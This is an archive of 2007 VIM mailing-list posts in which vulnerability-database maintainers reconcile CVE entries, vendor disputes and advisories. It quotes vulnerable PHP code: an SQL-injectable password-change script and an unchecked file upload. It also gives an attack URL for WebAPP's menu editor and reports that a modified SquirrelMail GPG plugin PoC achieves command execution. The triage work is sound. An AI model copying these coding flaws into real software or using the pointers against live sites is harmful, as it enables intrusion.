From coley at linus.mitre.org Mon Jul 2 21:37:08 2007
From: coley at linus.mitre.org (Steven M. Christey)
Date: Mon, 2 Jul 2007 17:37:08 -0400 (EDT)
Subject: [VIM] Questions about CVE-2007-3161
In-Reply-To: <46846712.3020209@tenablesecurity.com>
References: <46846712.3020209@tenablesecurity.com>
Message-ID:

I don't have any more information. The dates seem to align pretty well, though. Certainly sounds like either bullet could apply... or not.

Ah, the joys of changelogs!

- Steve

On Thu, 28 Jun 2007, George A. Theall wrote:

> Any bets the fix was classified as either:
>
> o "Random crashes while browsing."
> o "Numerous minor bugfixes and stability improvements."

From theall at tenablesecurity.com Tue Jul 3 11:17:21 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Tue, 03 Jul 2007 07:17:21 -0400
Subject: [VIM] Sun JDK Confusion
Message-ID: <468A3041.5000008@tenablesecurity.com>

Last May, there was an advisory published by Chris Evans about image parsing library vulnerabilities in Sun's JDK:

http://scary.beasts.org/security/CESA-2006-004.html

This seems to have resulted in Bugtraq 24267 / CVE-2007-3004 duplicating Bugtraq 24004 / CVE-2007-2788 and CVE-2007-2789.

Steve, any ideas?

George
--
theall at tenablesecurity.com

From rkeith at securityfocus.com Wed Jul 4 16:46:46 2007
From: rkeith at securityfocus.com (rkeith at securityfocus.com)
Date: Wed, 4 Jul 2007 10:46:46 -0600 (MDT)
Subject: [VIM] [theall@tenablesecurity.com: Sun JDK Confusion] (fwd)
Message-ID:

US-CERT seems to think Sun: 102934 relates to the CESA-2006-004 article. The Sun advisory however only credits Chris Evans, but includes no definitive link to the article. I am inclined to agree that it is a duplicate.
http://www.kb.cert.org/vuls/id/138545

References:
http://www.sunsolve.sun.com/search/document.do?assetkey=1-26-102934-1
http://java.sun.com/j2se/1.5.0/docs/guide/deployment/deployment-guide/jcp.html#update
http://scary.beasts.org/security/CESA-2006-004.html
http://java.sun.com/j2se/1.4.2/download.html
http://java.com/en/download/help/testvm.xml
http://www.cert.org/tech_tips/securing_browser/
http://www.color.org/

--
Rob Keith
Symantec

----- Forwarded message from "George A. Theall" -----

From: "George A. Theall"
Subject: [VIM] Sun JDK Confusion
To: Vulnerability Information Managers
Reply-To: Vulnerability Information Managers
Date: Tue, 03 Jul 2007 07:17:21 -0400
User-Agent: Thunderbird 2.0.0.4 (X11/20070604)
Message-ID: <468A3041.5000008 at tenablesecurity.com>

Last May, there was an advisory published by Chris Evans about image parsing library vulnerabilities in Sun's JDK:

http://scary.beasts.org/security/CESA-2006-004.html

This seems to have resulted in Bugtraq 24267 / CVE-2007-3004 duplicating Bugtraq 24004 / CVE-2007-2788 and CVE-2007-2789.

Steve, any ideas?

George
--
theall at tenablesecurity.com

----- End forwarded message -----

--
Dave McKinney
Symantec
keyID: E461AE4E
key fingerprint = F1FC 9073 09FA F0C7 500D D7EB E985 FAF3 E461 AE4E

From coley at linus.mitre.org Thu Jul 5 17:37:59 2007
From: coley at linus.mitre.org (Steven M. Christey)
Date: Thu, 5 Jul 2007 13:37:59 -0400 (EDT)
Subject: [VIM] Sun JDK Confusion
In-Reply-To: <468A3041.5000008@tenablesecurity.com>
References: <468A3041.5000008@tenablesecurity.com>
Message-ID:

I'm inclined to think that these are duplicates too, but I'll email Sun just to be sure.

On Tue, 3 Jul 2007, George A. Theall wrote:

> Last May, there was an advisory published by Chris Evans about image
> parsing library vulnerabilities in Sun's JDK:
>
> http://scary.beasts.org/security/CESA-2006-004.html
>
> This seems to have resulted in Bugtraq 24267 / CVE-2007-3004 duplicating
> Bugtraq 24004 / CVE-2007-2788 and CVE-2007-2789.
> Steve, any ideas?
>
>
> George
> --
> theall at tenablesecurity.com
>

From coley at mitre.org Mon Jul 9 14:44:35 2007
From: coley at mitre.org (Steven M. Christey)
Date: Mon, 9 Jul 2007 10:44:35 -0400 (EDT)
Subject: [VIM] old r0t links wiped out
Message-ID: <200707091444.l69EiZUb008510@faron.mitre.org>

Looks like r0t found the password to the old pridels.blogspot.com site, or maybe someone hacked into it. Either way, all the articles seem to be completely 404. Is anybody communicating with him these days? Anonymous comments are disabled on his page.

I've been thinking for a while that we could really use an archive.org-style Wayback Machine that records all these miscellaneous URLs and vendor news items, and only rolls them out when the old pages get deleted or killed. Ah, the things we would do if time and resources were plentiful...

- Steve

From sullo at cirt.net Mon Jul 9 14:52:38 2007
From: sullo at cirt.net (Sullo)
Date: Mon, 9 Jul 2007 10:52:38 -0400
Subject: [VIM] old r0t links wiped out
In-Reply-To: <200707091444.l69EiZUb008510@faron.mitre.org>
References: <200707091444.l69EiZUb008510@faron.mitre.org>
Message-ID: <20070709105238.0pxszzwqgwcokco0@webmail.sullo.com>

Quoting "Steven M. Christey" :

> I've been thinking for a while that we could really use an
> archive.org-style Wayback Machine that records all these miscellaneous
> URLs and vendor news items, and only rolls them out when the old pages
> get deleted or killed. Ah, the things we would do if time and
> resources were plentiful...

Yeah... we've talked about this as well... just need the time to make something good (and safe)!

Alternately, we could actually use (abuse?) the wayback machine to catalog. 6 month lag, though... and would take some work for each one:
http://www.archive.org/about/faqs.php#1

Also, you may want to check to see if you have any links to frog-man.org as well--Nikto DB had several for advisories, and that site is gone (ad site now).
A week or so ago I managed to find a few on archive.org and put them OSVDB.org if you need the links (I can dig them up).

--
http://cirt.net | http://osvdb.org/

From ge at linuxbox.org Mon Jul 9 14:55:01 2007
From: ge at linuxbox.org (Gadi Evron)
Date: Mon, 9 Jul 2007 09:55:01 -0500 (CDT)
Subject: [VIM] old r0t links wiped out
In-Reply-To: <20070709105238.0pxszzwqgwcokco0@webmail.sullo.com>
References: <200707091444.l69EiZUb008510@faron.mitre.org> <20070709105238.0pxszzwqgwcokco0@webmail.sullo.com>
Message-ID:

On Mon, 9 Jul 2007, Sullo wrote:

> Quoting "Steven M. Christey" :
>
>> I've been thinking for a while that we could really use an
>> archive.org-style Wayback Machine that records all these miscellaneous
>> URLs and vendor news items, and only rolls them out when the old pages
>> get deleted or killed. Ah, the things we would do if time and
>> resources were plentiful...
>
> Yeah... we've talked about this as well... just need the time to make
> something good (and safe)!
>
> Alternately, we could actually use (abuse?) the wayback machine to catalog. 6
> month lag, though... and would take some work for each one:
> http://www.archive.org/about/faqs.php#1
>
> Also, you may want to check to see if you have any links to frog-man.org as
> well--Nikto DB had several for advisories, and that site is gone (ad site
> now). A week or so ago I managed to find a few on archive.org and put them
> OSVDB.org if you need the links (I can dig them up).

I wonder if they are still cached by Google.
>
> --
> http://cirt.net | http://osvdb.org/
>

From jericho at attrition.org Mon Jul 9 20:31:51 2007
From: jericho at attrition.org (security curmudgeon)
Date: Mon, 9 Jul 2007 20:31:51 +0000 (UTC)
Subject: [VIM] old r0t links wiped out
In-Reply-To: <200707091444.l69EiZUb008510@faron.mitre.org>
References: <200707091444.l69EiZUb008510@faron.mitre.org>
Message-ID:

: I've been thinking for a while that we could really use an
: archive.org-style Wayback Machine that records all these miscellaneous
: URLs and vendor news items, and only rolls them out when the old pages
: get deleted or killed. Ah, the things we would do if time and resources
: were plentiful...

Due to the style of blogs and variety, I don't mirror blog content usually. I do grab a copy of .txt or .pdf advisories many times since wget likes those w/o hassle =)

From theall at tenablesecurity.com Tue Jul 10 01:46:25 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Mon, 09 Jul 2007 21:46:25 -0400
Subject: [VIM] SquirrelMail GPG Plugin Vulnerabilities
Message-ID: <4692E4F1.7000207@tenablesecurity.com>

I'm trying to make sense of the spate of recent vulnerabilities associated with the GPG Plugin for SquirrelMail.

o There's the WabiSabiLabi advisory (ZD-00000004) that sparked the interest. It supposedly affects version 2.0 of the plugin, is remotely exploitable, and allows for command execution.

o The author released version 2.1 of the plugin on 7/7 and says it "contains security fixes to prevent possible command injection attacks by local authenticated users against the webserver user." I don't find any reference in the release or on the author's site to the WabiSabiLabi advisory per se, and the CVS commit log for the software, at , shows only a single change in 2007, made on 7/7, for a local file include issue in the 'gpg_pop_init.php' script as noted by Stefan Esser. [A quick check shows that it involves the 'MOD' parameter and can be exploited remotely without authentication.]
o http://lists.immunitysec.com/pipermail/dailydave/2007-July/004448.html is a post made by Charlie Miller on 7/6 to Daily Dave in which he suggests the issue underlying ZD-00000004 might involve $passphrase in gpg_sign_attachment() although he has not actually verified it.

o http://lists.immunitysec.com/pipermail/dailydave/2007-July/004452.html is a post made by Nicob on 7/8 to Daily Dave that mentions an attack vector fixed in version 2.1 but provides no specifics.

o http://lists.immunitysec.com/pipermail/dailydave/2007-July/004453.html is a post from Stefan Esser on 7/9 to Daily Dave that asserts there are several more shell command execution flaws in version 2.1 that the vendor is aware of. Unfortunately, he provides no specifics.

o http://lists.immunitysec.com/pipermail/dailydave/2007-July/004456.html is a post made by Nicob on 7/9 to Daily Dave that details an attack vector involving the gpg_check_sign_pgp_mime() function in gpg_hook_functions.php.

So, how are you VDB folks sorting all this out? I've noticed so far that Bugtraq 24782 maps to WabiSabiLabi's advisory (although oddly it claims the issue has now been resolved with version 2.1 of the plugin) and 24828 to Esser's posting. Am I getting all this straight?

George
--
theall at tenablesecurity.com

From nicob at nicob.net Tue Jul 10 11:40:31 2007
From: nicob at nicob.net (Nicob)
Date: Tue, 10 Jul 2007 13:40:31 +0200
Subject: [VIM] SquirrelMail GPG Plugin Vulnerabilities
In-Reply-To: <4692E4F1.7000207@tenablesecurity.com>
References: <4692E4F1.7000207@tenablesecurity.com>
Message-ID: <1184067631.5902.43.camel@localhost>

> o http://lists.immunitysec.com/pipermail/dailydave/2007-July/004452.html
> is a post made by Nicob on 7/8 to Daily Dave that mentions an attack vector
> fixed in version 2.1 but provides no specifics.
> o http://lists.immunitysec.com/pipermail/dailydave/2007-July/004456.html
> is a post made by Nicob on 7/9 to Daily Dave that details an attack
> vector involving the gpg_check_sign_pgp_mime() function in
> gpg_hook_functions.php.

That's the same vuln. My PoC for the gpg_check_sign_pgp_mime() command execution doesn't affect version 2.1 because of a switch from exec() to proc_open(). But I wouldn't bet there's no more room for exploitation of this very vuln if somebody spends enough time to understand their complex use of proc_open().

Nicob

From heinbockel at mitre.org Tue Jul 10 16:50:24 2007
From: heinbockel at mitre.org (Heinbockel, Bill)
Date: Tue, 10 Jul 2007 12:50:24 -0400
Subject: [VIM] AVTutorial 1.0 changePW.php vulnerabilities
Message-ID: <224FBC6B814DBD4E9B9E293BE33A10DC0201F4DC@IMCSRV5.MITRE.ORG>

There are (at least) two different issues recently reported in changePW.php in AVTutorial 1.0:

(1) Password change for arbitrary users [CVE-2007-3630]
http://www.milw0rm.com/exploits/4163

(2) SQL injection - in the id and userid parameters
http://secunia.com/advisories/25969

Now, the code from changePW.php:

> $id = $_GET['userid'];
> $oldpassword = $_GET['id'];
> $password = $_POST['password'];
> $password = stripslashes($password);
> $password = md5($password);
> $sql = mysql_query("UPDATE ls_users SET password='$password' WHERE id='$id' AND password='$oldpassword'")
> or die (mysql_error());
> echo "Password has been changed";

William Heinbockel
Infosec Engineer, Sr.
The MITRE Corporation
202 Burlington Rd. MS S145
Bedford, MA 01730
heinbockel at mitre.org
781-271-2615

From coley at linus.mitre.org Tue Jul 10 18:03:46 2007
From: coley at linus.mitre.org (Steven M. Christey)
Date: Tue, 10 Jul 2007 14:03:46 -0400 (EDT)
Subject: [VIM] Vendor dispute - Google Custom Search Engine XSS (CVE-2007-3484)
Message-ID:

Dispute from the Google security team. Apparently the original researcher found an issue in a modified site. Not sure if other VDBs picked it up.
- Steve

Date: Fri, 6 Jul 2007 15:28:34 -0700
To: cve at mitre.org, coley at rcf-smtp.mitre.org
Subject: Followup to CVE-2007-3484

The Google security team discovered the CVE candidate CVE-2007-3484 and would like to submit the following vendor response.

"This is not a bug in the Google Custom Search Engine (http://google.com/coop/cse/) product, as Google does not provide the "search.php" script referenced. When a user creates a custom search engine, we provide them with a block of javascript to include on their site. Some users write additional code around this block of javascript to further customize their website. The three examples provided at websecurity.com.ua/1050/ are three independent XSS vulnerabilities in their own respective sites and are not related to Google.

Google is an ardent believer in responsible disclosure, as it helps protect users from exploitation of security flaws. If you find an issue with a Google product, please notify us at security at google.com. We appreciate the efforts of security researchers who have responsibly disclosed issues in our software; we are happy to thank contributors on www.google.com/corporate/security.html."

security at google.com

From coley at linus.mitre.org Tue Jul 10 18:07:07 2007
From: coley at linus.mitre.org (Steven M. Christey)
Date: Tue, 10 Jul 2007 14:07:07 -0400 (EDT)
Subject: [VIM] Vendor ACK: CVE-2007-2017 (AlstraSoft useredit.php auth bypass)
Message-ID:

---------- Forwarded message ----------
Date: Sat, 7 Jul 2007 14:51:07 +0800
From: AlstraSoft
Subject: Vulnerability Report (submitted through the National Vulnerability Database)

Regarding: http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2017

This security loophole has been fixed in our current version, in which we have added the admin login check for useredit.php and checking of the "id" in msg.php - www.alstrasoft.com/videoshare_fix.zip

AlstraSoft Support Team
http://www.alstrasoft.com

From coley at linus.mitre.org Wed Jul 11 00:06:27 2007
From: coley at linus.mitre.org (Steven M. Christey)
Date: Tue, 10 Jul 2007 20:06:27 -0400 (EDT)
Subject: [VIM] Sun JDK Confusion
In-Reply-To:
References: <468A3041.5000008@tenablesecurity.com>
Message-ID:

Sun confirmed that CVE-2007-3004 is a duplicate of CVE-2007-2788/CVE-2007-2789. We'll be rejecting CVE-2007-3004 accordingly.

- Steve

From jericho at attrition.org Wed Jul 11 00:43:29 2007
From: jericho at attrition.org (security curmudgeon)
Date: Wed, 11 Jul 2007 00:43:29 +0000 (UTC)
Subject: [VIM] vendors bring it on themselves sometimes..
In-Reply-To: <20070711002014.GQ4885@verysecurelinux.com>
References: <20070711002014.GQ4885@verysecurelinux.com>
Message-ID:

: Wachovia Bank website sends confidential information (social security
: numbers, phone number, address, etc.) over the Internet without
: encryption.
:
: Horizon Network Security Security Advisory 07/10/2007

: The vendor (Wachovia Bank) was notified via their customer service phone
: number on June 25. We were transferred to "web support". The person
: answering asked us to FAX the details to her and we did so, also on June
: 25. We explained that we were reporting a severe security problem on
: their web site.

: VIII. DISCLOSURE TIMELINE
:
: 06/25/2007 Initial vendor notification
: 06/25/2007 Vendor requested FAXed details
: 06/25/2007 Details FAXed to vendor
:
: 07/20/2007 No vendor response
: 07/20/2007 Public disclosure on this Full Disclosure list

In this day and age, asking for the information to be faxed is silly.

From theall at tenablesecurity.com Wed Jul 11 17:15:52 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Wed, 11 Jul 2007 13:15:52 -0400
Subject: [VIM] True: SquirrelMail G/PGP Encryption Plug-in 2.0 Command Execution Vuln
Message-ID: <46951048.4080003@tenablesecurity.com>

FWIW, Milw0rm 4173 works for me under Squirrelmail 1.4.10a and GPG plugin 2.0. With some slight modifications of the PoC, you don't need authentication and can return results of any commands.

The modified PoC also works against version 2.1 of the plugin. I don't seem to be able to return results of the commands directly, but it is possible to redirect to a file and then read that later.

George
--
theall at tenablesecurity.com

From theall at tenablesecurity.com Fri Jul 13 02:20:18 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Thu, 12 Jul 2007 22:20:18 -0400
Subject: [VIM] MkPortal <= 1.1.1 reviews / gallery modules SQL Injection Exploit
Message-ID: <4696E162.6020602@tenablesecurity.com>

Milw0rm 4179 / BID 24891 seems like it's a subset of the issues covered by BID 24886 / . That is, the 'ind' parameter controls the module, 'op' controls the function, and 'iden' is the specific input passed to the SQL queries.

Anyone else notice this?

George
--
theall at tenablesecurity.com

From smoore at securityglobal.net Sat Jul 14 03:26:15 2007
From: smoore at securityglobal.net (Stuart Moore)
Date: Fri, 13 Jul 2007 23:26:15 -0400
Subject: [VIM] Sun JDK Confusion
In-Reply-To:
References: <468A3041.5000008@tenablesecurity.com>
Message-ID: <46984257.9090104@securityglobal.net>

How about CVE-2007-3005? Similar situation, I think.

Stuart

Steven M. Christey wrote:
> Sun confirmed that CVE-2007-3004 is a duplicate of
> CVE-2007-2788/CVE-2007-2789. We'll be rejecting CVE-2007-3004
> accordingly.
>
> - Steve
>

From str0ke at milw0rm.com Sat Jul 14 23:13:47 2007
From: str0ke at milw0rm.com (str0ke)
Date: Sat, 14 Jul 2007 18:13:47 -0500
Subject: [VIM] Fwd: Menu Manager Mod for WebAPP - No Input Filtering
In-Reply-To: <20070714045620.8810.qmail@securityfocus.com>
References: <20070714045620.8810.qmail@securityfocus.com>
Message-ID: <814b9d50707141613k5895beb0l2af0b6b13f0f5537@mail.gmail.com>

The plot thickens?

---------- Forwarded message ----------
From: info at web-app.net
Date: 14 Jul 2007 04:56:20 -0000
Subject: Re: Menu Manager Mod for WebAPP - No Input Filtering
To: bugtraq at securityfocus.com

The issue is not yet secure at http://www.web-app.org

1.) Guests can edit files on the server by:
http://victim-domain/cgi-bin/index.cgi?action=menu
- There are approximately 35 webapporg sites of version 0.9.9.7 defaced with the issue. So it couldn't possibly be fixed for 0.9.9.7 as claimed above.

2.) Members/guests can add $values in the menu form. Allowing $ is madness, as it can be exploited to run direct cmd on the Perl shell.

I tried posting a message about it before here but it was unnoticed and never published.

Kind regards
On Elpeleg
WebAPP

From webapp at web-app.org Sun Jul 15 21:15:39 2007
From: webapp at web-app.org (Web-APP)
Date: Sun, 15 Jul 2007 14:15:39 -0700
Subject: [VIM] Fwd: Menu Manager Mod for WebAPP - No Input Filtering
References: <20070714045620.8810.qmail@securityfocus.com> <814b9d50707141613k5895beb0l2af0b6b13f0f5537@mail.gmail.com>
Message-ID: <000601c7c725$4c536680$0400a8c0@hsd1.wa.comcast.net>

Wow.

----- Original Message -----
From: "str0ke"
To: "Vulnerability Information Managers"
Sent: Saturday, July 14, 2007 4:13 PM
Subject: [VIM] Fwd: Menu Manager Mod for WebAPP - No Input Filtering

> The plot thickens?
>
> ---------- Forwarded message ----------
> From: info at web-app.net
> Date: 14 Jul 2007 04:56:20 -0000
> Subject: Re: Menu Manager Mod for WebAPP - No Input Filtering
> To: bugtraq at securityfocus.com
>
>
> The issue is not yet secure at http://www.web-app.org
>
> 1.) Guests can edit files on the server by:
> http://victim-domain/cgi-bin/index.cgi?action=menu
> - There are approximately 35 webapporg sites of version 0.9.9.7
> defaced with the issue. So it couldn't possibly be fixed for 0.9.9.7
> as claimed above.
>
> 2.) Members/guests can add $values in the menu form. Allowing $ is
> madness, as it can be exploited to run direct cmd on the Perl shell.
>
> I tried posting a message about it before here but it was unnoticed
> and never published.
>
> Kind regards
> On Elpeleg
> WebAPP
>

From webapp at web-app.org Sun Jul 15 21:33:58 2007
From: webapp at web-app.org (Web-APP)
Date: Sun, 15 Jul 2007 14:33:58 -0700
Subject: [VIM] Fwd: Menu Manager Mod for WebAPP - No Input Filtering
References: <20070714045620.8810.qmail@securityfocus.com> <814b9d50707141613k5895beb0l2af0b6b13f0f5537@mail.gmail.com>
Message-ID: <000e01c7c727$db8c3780$0400a8c0@hsd1.wa.comcast.net>

Incidentally, I came across the original thread where On was concerned with this issue, at http://www.web-app.org/cgi-bin/index.cgi?action=forum&board=security101&op=display&num=8837 . At the time I was exhausted script-wise and deprived life-wise from producing 0.9.9.3, which was WebAPP's biggest set of changes and additions ever done in one version. Since the security team had considered the issue and dismissed it as not a security problem, I too overlooked it, apparently, following that thread.

The menu manager was originally "Jack Deth's" addition. Maybe he knows a little more about this suspected security loophole. On was against adding it, but his protests came along after the release had already been made. And then they were dismissed by "Mossad" and then On.

Is there still a valid issue here?
If so, anybody care to share it with us so we can make any necessary patches?

http://www.web-app.org
WebAPP
The "who can make a better WebAPP Web Automated Perl Portal" project.

----- Original Message -----
From: "str0ke"
To: "Vulnerability Information Managers"
Sent: Saturday, July 14, 2007 4:13 PM
Subject: [VIM] Fwd: Menu Manager Mod for WebAPP - No Input Filtering

> The plot thickens?
>
> ---------- Forwarded message ----------
> From: info at web-app.net
> Date: 14 Jul 2007 04:56:20 -0000
> Subject: Re: Menu Manager Mod for WebAPP - No Input Filtering
> To: bugtraq at securityfocus.com
>
>
> The issue is not yet secure at http://www.web-app.org
>
> 1.) Guests can edit files on the server by:
> http://victim-domain/cgi-bin/index.cgi?action=menu
> - There are approximately 35 webapporg sites of version 0.9.9.7
> defaced with the issue. So it couldn't possibly be fixed for 0.9.9.7
> as claimed above.
>
> 2.) Members/guests can add $values in the menu form. Allowing $ is
> madness, as it can be exploited to run direct cmd on the Perl shell.
>
> I tried posting a message about it before here but it was unnoticed
> and never published.
>
> Kind regards
> On Elpeleg
> WebAPP
>

From coley at linus.mitre.org Wed Jul 18 15:49:59 2007
From: coley at linus.mitre.org (Steven M. Christey)
Date: Wed, 18 Jul 2007 11:49:59 -0400 (EDT)
Subject: [VIM] Vendor ACK for CVE-2007-3677 (eVisit Analyst)
Message-ID:

---------- Forwarded message ----------
Date: Wed, 18 Jul 2007 16:43:15 +0100
From: John Harrison
To: cve at mitre.org
Subject: CVE-2007-3677

Hi

The following entry on your website:

CVE-2007-3677

The information presented on your website regarding this issue is not a complete copy of the original Portcullis Security Advisory 06-057. In particular it omits vital information including the following:

"The vendor has been notified and the vulnerability fixed."

Because of this omission your website implies that there is a current problem with eVisit Analyst. This is not correct.
We would be grateful if you could correct this as a matter of urgency.

Regards

John

John Harrison
Maxsi Ltd

From theall at tenablesecurity.com Wed Jul 18 20:56:20 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Wed, 18 Jul 2007 16:56:20 -0400
Subject: [VIM] Confirm: Joomla Component Expose <= RC35 Remote File Upload Vulnerability
Message-ID: <469E7E74.7090306@tenablesecurity.com>

Milw0rm 4194 is valid. Looking at the code, we have this:

--- snip, snip, snip ---
if (isset($_FILES['userfile'])) {
    $target_path = "../../../components/com_expose/expose/img/";
    $target_path = $target_path . basename( $_FILES['userfile']['name']);
    $userfile_name = (isset($_FILES['userfile']['name']) ? $_FILES['userfile']['name'] : "");
    $filename = split("\.", $userfile_name);

    if ((strcasecmp(substr($userfile_name,-4),'.jpg'))) {
        echo "";
    }

    if(!move_uploaded_file($_FILES['userfile']['tmp_name'], $target_path)) {
--- snip, snip, snip ---

As you can plainly see, the code doesn't exit if the upload's filename doesn't end with '.jpg' but happily continues to move the file over to the destination in a directory under the document root.

George
--
theall at tenablesecurity.com

From coley at mitre.org Thu Jul 19 20:34:19 2007
From: coley at mitre.org (Steven M. Christey)
Date: Thu, 19 Jul 2007 16:34:19 -0400 (EDT)
Subject: [VIM] There is no AS02 in Oracle CPU Jul 2007
Message-ID: <200707192034.l6JKYJDO026718@faron.mitre.org>

This month's CPU lists AS02 under "Oracle Collaboration Suite" and has it in italics, which usually suggests that the issue appears in multiple products. However, there is no AS02 under the Application Server section - there's only an AS01.

Oracle just confirmed to me that the "AS02" was a typo, and should have been just AS01.
- Steve

From mschoene at redhat.com Fri Jul 20 13:33:36 2007
From: mschoene at redhat.com (Marc Schoenefeld)
Date: Fri, 20 Jul 2007 15:33:36 +0200
Subject: [VIM] Sun JDK Confusion
In-Reply-To:
References: <468A3041.5000008@tenablesecurity.com>
Message-ID: <46A0B9B0.5010206@redhat.com>

Hi Steve,

how about CVE-2007-3005? Is this also a duplicate?

Regards
Marc

Steven M. Christey wrote:
> Sun confirmed that CVE-2007-3004 is a duplicate of
> CVE-2007-2788/CVE-2007-2789. We'll be rejecting CVE-2007-3004
> accordingly.
>
> - Steve
>

--
Marc Schoenefeld / Red Hat Security Response Team

From jericho at attrition.org Sun Jul 22 11:01:43 2007
From: jericho at attrition.org (security curmudgeon)
Date: Sun, 22 Jul 2007 11:01:43 +0000 (UTC)
Subject: [VIM] Symantec advisory CVE question/confusion
Message-ID:

In reference to the following advisory, the revision history doesn't include dates, and it doesn't indicate which information was wrong now:

http://securityresponse.symantec.com/avcenter/security/Content/2007.07.11f.html

Revision History
Removed invalid CVE information

--

The advisory above is for "two vulnerabilities" in the Decomposer component. The following two CVE entries seem to match:

CVE-2007-3801
CONFIRM:http://securityresponse.symantec.com/avcenter/security/Content/2007.07.11f.html
RAR archive file header infinite loop DoS

CVE-2007-3802
CONFIRM:http://securityresponse.symantec.com/avcenter/security/Content/2007.07.11f.html
CAB archive arbitrary code execution

The following two ZDI advisories also seem to match, but list two different CVE numbers, both in reserved status.
I have a hunch that these numbers were the ones removed from the Symantec advisory and are now essentially duplicates (or will be rejected in favor of the ones above):

http://www.zerodayinitiative.com/advisories/ZDI-07-040.html
CVE-2007-0447
http://www.symantec.com/avcenter/security/Content/2007.07.11f.html
CAB parsing heap overflow

http://www.zerodayinitiative.com/advisories/ZDI-07-039.html
CVE-2007-3699
http://www.symantec.com/avcenter/security/Content/2007.07.11f.html
RAR archive DoS

Can Symantec or CVE confirm this?

Brian
OSVDB.org

From jericho at attrition.org Tue Jul 24 12:40:35 2007
From: jericho at attrition.org (security curmudgeon)
Date: Tue, 24 Jul 2007 12:40:35 +0000 (UTC)
Subject: [VIM] question for str0ke
Message-ID:

CVE-2007-1710

references: http://www.milw0rm.com/exploits/3573

This shows up as a blank page. Any notes on why it was removed? Any chance you can start putting brief explanations on why they are removed?

From str0ke at milw0rm.com Tue Jul 24 12:58:37 2007
From: str0ke at milw0rm.com (str0ke)
Date: Tue, 24 Jul 2007 07:58:37 -0500
Subject: [VIM] question for str0ke
In-Reply-To:
References:
Message-ID: <814b9d50707240558u37b78b56s14c14fe4b22b5286@mail.gmail.com>

Sorry about that. The file was removed due to it being stolen work from someone else, with a name change here and there. Anything from last week on will now have a short description.

/str0ke

On 7/24/07, security curmudgeon wrote:
>
> CVE-2007-1710
>
> references: http://www.milw0rm.com/exploits/3573
>
> This shows up as a blank page. Any notes on why it was removed? Any chance
> you can start putting brief explanations on why they are removed?
>

From jericho at attrition.org Tue Jul 24 13:13:20 2007
From: jericho at attrition.org (security curmudgeon)
Date: Tue, 24 Jul 2007 13:13:20 +0000 (UTC)
Subject: [VIM] question for str0ke
In-Reply-To: <814b9d50707240558u37b78b56s14c14fe4b22b5286@mail.gmail.com>
References: <814b9d50707240558u37b78b56s14c14fe4b22b5286@mail.gmail.com>
Message-ID:

: The file was removed due to it being stolen work from someone else, with
: a name change here and there. Anything from last week on will now have
: a short description.

Do you have a reference for the other work it was stolen from?

From str0ke at milw0rm.com Tue Jul 24 13:47:55 2007
From: str0ke at milw0rm.com (str0ke)
Date: Tue, 24 Jul 2007 08:47:55 -0500
Subject: [VIM] question for str0ke
In-Reply-To:
References: <814b9d50707240558u37b78b56s14c14fe4b22b5286@mail.gmail.com>
Message-ID: <814b9d50707240647ga175477m993dcd2568f44db3@mail.gmail.com>

When I get a little time today I'll throw you what I had up at the time.

/str0ke

On 7/24/07, security curmudgeon wrote:
>
> : The file was removed due to it being stolen work from someone else, with
> : a name change here and there. Anything from last week on will now have
> : a short description.
>
> Do you have a reference for the other work it was stolen from?
>

From jericho at attrition.org Tue Jul 24 14:56:45 2007
From: jericho at attrition.org (security curmudgeon)
Date: Tue, 24 Jul 2007 14:56:45 +0000 (UTC)
Subject: [VIM] zoo - amavis - barracuda cross-ref problems
Message-ID:

http://www.amavis.org/security/asa-2007-2.txt

o zoo-2.10 - CVE-2007-1669: A patch for version 2.10 is provided in section VII of the original zoo advisory.

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2007-1669

Barracuda Spam Firewall 3.4 and later with virusdef before 2.0.6399, and Spam Firewall before 3.4 20070319 with virusdef before 2.0.6399o, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file.
http://secunia.com/advisories/25315/

Amavis Zoo Denial of Service Vulnerability
CVE reference: CVE-2007-1669

So the Amavis and Secunia advisory both ref the same CVE specifying 'Zoo', but CVE is more specific saying Barracuda and not wording it to mention Zoo as the underlying problem.

From coley at linus.mitre.org Wed Jul 25 21:46:11 2007
From: coley at linus.mitre.org (Steven M. Christey)
Date: Wed, 25 Jul 2007 17:46:11 -0400 (EDT)
Subject: [VIM] zoo - amavis - barracuda cross-ref problems
In-Reply-To:
References:
Message-ID:

CVE didn't pick up SA25315, and we didn't independently notice the AMaViS advisory, which is why it wasn't mentioned. The phrasing for 2007-1669 definitely could have been better, instead of emphasizing Barracuda so much. I've changed both CVEs to mention AMaViS specifically.

Note that the AMaViS advisory implies that the problem only occurs when AMaViS is installed on a system that already independently has the vulnerable ZOO software. So, this isn't necessarily a case of borrowed code appearing in AMaViS, rather a defense-in-depth measure like when Mozilla recently defended itself against the IE argument injection issue.

- Steve

From jericho at attrition.org Fri Jul 27 12:08:52 2007
From: jericho at attrition.org (security curmudgeon)
Date: Fri, 27 Jul 2007 12:08:52 +0000 (UTC)
Subject: [VIM] RedLevel RedAlert silliness
Message-ID:

http://redlevel.org/redalert.php

The red bar on the left indicates the amount of current vulnerabilities discovered throughout the world. This bar updates every 15 seconds. If a new threat is discovered, it is posted and displayed here.

--

The current "Active" number is 76. How do they get this? From the footer:

This demo of RedAlert fetches RSS from SecurityFocus.com; specifically, the BugTraq mailing list. This RSS feed is then parsed, a number is recorded, posted to a local MySQL database, and retrieved with a few lines of ActionScript and PHP.
(and if you're wondering, the redlevel.org reference for CVE-2007-2806 doesn't work now, which is what led me to this)

